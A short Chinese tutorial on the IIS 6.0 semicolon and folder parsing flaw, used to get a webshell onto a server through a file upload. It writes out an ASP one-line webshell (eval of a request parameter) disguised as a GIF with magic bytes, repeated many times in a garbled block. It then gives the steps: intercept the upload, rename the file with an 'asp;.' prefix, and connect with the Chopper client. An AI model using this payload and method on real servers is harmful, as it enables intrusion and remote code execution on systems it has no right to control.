漏洞原理:
- 基于文件
IIS6.0默认不解析;号后面的内容,例如1.asp;.jpg会当成1.asp解析,相当于分号截断。
- 基于文件夹
IIS6.0会将/*.asp/文件夹下的文件当成asp解析。
案例:
写一个木马文件,并改为jpg后缀
GIF89agif89A<%eval request("pass")%>GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
GIF89agif89A<%eval request("pass")%>
<%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%><%eval request("pass")%>
如果不修改前缀上传就是正常访问图片
通过抓包给文件加上1.asp;.的前缀,使他保存的时候可以被执行
当加上前缀上传成功后,这时候就触发了IIS6.0默认不解析;号后面的内容,可以看到文件被当作asp解析了
我们用菜刀就可以链接成功了
